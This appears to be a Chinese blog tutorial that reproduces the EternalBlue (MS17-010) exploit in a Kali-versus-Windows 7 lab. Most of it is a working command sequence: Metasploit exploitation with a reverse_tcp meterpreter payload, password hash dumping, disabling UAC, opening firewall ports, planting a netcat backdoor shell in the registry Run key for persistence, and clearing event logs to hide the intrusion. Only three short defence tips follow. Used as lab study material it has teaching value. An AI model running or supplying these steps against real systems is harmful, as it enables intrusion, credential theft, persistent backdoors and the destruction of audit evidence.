kali网络攻防—复现勒索病毒（永恒之蓝）漏洞

冬日的月光

2017年5月12日，WannaCry勒索病毒借助于永恒之蓝漏洞传遍全球。英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网依依中招，其被勒索支付高额赎金才能解密恢复文件。


多年过去了，WannaCry早已不在，但永恒之蓝却还在不断发挥着他的威力，各式各样的勒索软件、蠕虫病毒、挖矿木马等都在借助他传播，其更像是变异的勒索蠕虫。

445端口简介
445端口是一个毁誉参半的端口，有了它我们可以在局域网中轻松访问各种共享文件夹或共享打印机，但也正是因为有了它，黑客们才有了可乘之机。
他们能通过该端口偷偷共享你的硬盘，甚至会在悄无声息中将你的硬盘格式化掉 ! 2017年10月，由于病毒"坏兔子"来袭，国家互联网应急中心等安全机构建议用户及时关闭计算机以及网络设备上的445和139端口 。

复现环境
攻击机：kali (192.168.203.130)
靶机：Windows 7 (192.168.203.134)

复现过程
1、主机发现
nmap进行ip端口扫描：
nmap -T4 -A -v 192.168.203.134#靶机ip地址扫描到开放了445端口，而永恒之蓝利用的就是445端口的smb服务，操作系统溢出漏洞。



2、进入MSF框架
msfconsole


search ms17-010

通过这两个工具，其中
1、0 exploit/windows/smb/ms17_010_eternalblue是永恒之蓝攻击代码，一般两者配合使用，前者先扫描，若是显示有漏洞，再进行攻击。
2、3 auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块，探测主机是否存在MS17-010漏洞。

3、使用ms17-010扫描模块，对靶机进行扫描
3.1 使用模块
该模块不会直接在攻击机和靶机之间建立访问，他们只负责执行扫描，嗅探，指纹识别的相关功能，以辅助渗透测试。
use auxiliary/scanner/smb/smb_ms17_010
3.2查看模块需要配置的参数
show options

Required栏中选项为yes的说明对应的Current Setting栏需要填写，如RHOSTS

3.3设置攻击目标
RHOSTS 参数是要探测主机的ip或ip范围
设置攻击目标ip：
set rhosts  192.168.203.134


3.4再次查看配置参数
show options


3.5执行扫描
run

显示主机可能容易受到 MS17-010 的攻击！- Windows 7 x64（64 位）

4、使用ms17-010攻击模块，对靶机进行攻击
use exploit/windows/smb/ms17_010_eternalblue


4.1查看这个漏洞的信息
info
4.2查看可攻击的系统平台
这个命令显示该攻击模块针对哪些特定操作系统版本、语言版本的系统
show targets


4.3查看攻击载荷
攻击载荷是我们期望在目标系统在被渗透攻击之后完成的实际攻击功能的代码，成功渗透目标后，用于在目标系统上运行任意命令。
show payloads该命令可以查看当下漏洞利用模块下可用的所有Payload



4.4设置攻击载荷
（默认windows/x64/meterpreter/reverse_tcp）
set payload windows/x64/meterpreter/reverse_tcp



4.5查看参数配置
show options


4.6设置目标攻击目标ip
set LHOST 192.168.203.130


4.7执行攻击
exploit(run)攻击成功，显示下图：


在这里可以进行文件上传下载，获取截屏，获取密码，使用摄像头拍照，后门持久化等操作

5、后渗透阶段
运行了exploit命令之后，我们开启了一个reverse TCP监听器来监听本地的 4444 端口，即攻击者的本地主机地址（LHOST）和端口号（LPORT）。
在meterpreter > 中我们可以使用以下的命令来实现对目标的操作：
示例：
1、查看主机系统信息
sysinfo


2、查看主机ip
ipconfig


3、查看用户身份
getuid

用户身份为：NT AUTHORITY\SYSTEM，这个也就是Windows的系统权限

4、获得shell控制台
shell


想要从目标主机shell退出到meterpreter
exit


5、获取截屏
screenshot






下面的模块主要用于在取得目标主机系统远程控制权后，进行一系列的后渗透攻击动作
run post/windows/manage/migrate                  #自动进程迁移     
示例：
1、获取用户密码
run windows/gather/smart_hashdump或者hashdump




在网上搜索MD5破解即可查到相关破解网站：



2、开启远程桌面
运用getuid脚本开启目标主机远程桌面：
run getgui -e或者run post/windows/manage/enable_rdp


在kali终端输入
rdesktop 192.168.203.134#靶机ip地址
即可打开远程桌面





6、关闭主机防护策略并开启后门
6.1查看用户及密码
hashdump


6.2创建防火墙规则
创建一条防火墙规则允许4444端口访问网络，方便后期操作
shell



新建一个防火墙规则，允许443端口访问网络
netsh firewall add portopening TCP 443 "hack" ENABLE ALL


6.3关闭UAC
其原理就是通知用户是否对应用程序使用硬盘驱动器和系统文件授权，以达到帮助阻止恶意程序损坏系统的效果。
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f



6.4开启默认共享
开启系统主机的默认共享，默认共享对于主机文件共享非常方便，也方便黑客利用这个功能，远程执行命令。
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f


exit返回meterpreter，输入background将永恒之蓝拿到的会话保持到后台。



6.5使用扫描模块
use exploit/windows/smb/psexec


6.6查看需要设置的参数
show options


设置靶机ip：set rhosts 192.168.203.134



6.7上传后门程序
为了让连接持久话，我们可以上传后门程序，这样就能保持会话长久建立。在kali 里面如下路径有我们的后门程序nc 俗称瑞士军刀。我们可以将它上传到目标机c盘里面



上传nc到c盘windows文件夹中，如果想更隐蔽一点，可以在往文件夹里面上传



打开靶机window文件夹可以看到成功上传文件。



6.8设置键值
当目标机开机，程序后台运行，且监听端口为443，这个端口就是之前在shell中创建的新防火墙规则：允许443端口访问网络。
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\nc.exe -Ldp 443 -e cmd.exe'


6.9重启目标主机
reboot



在kali终端就可以直接使用
nc -v 192.168.203.134 443
连接了


这样就可以直接通过nc监听靶机。
至此，永恒之蓝的攻击复现就完成了，后续其他的进一步攻击可以向上传nc一样上传病毒。

7、清除事件日志
由于攻击过程中的所有操作都会被记录在目标系统的日志文件之中，因此需要在完成攻击之后使用
clearev  
命令来清除事件日志：



漏洞防御
1、关闭445端口。
2、打开防火墙，安装安全软件。
3、安装对应补丁
如果有对go语言、黑客、kali、linux、K8S、网络安全等感兴趣的小伙伴，也可以关注公众号“学神来啦”，了解更多，定时更新哦~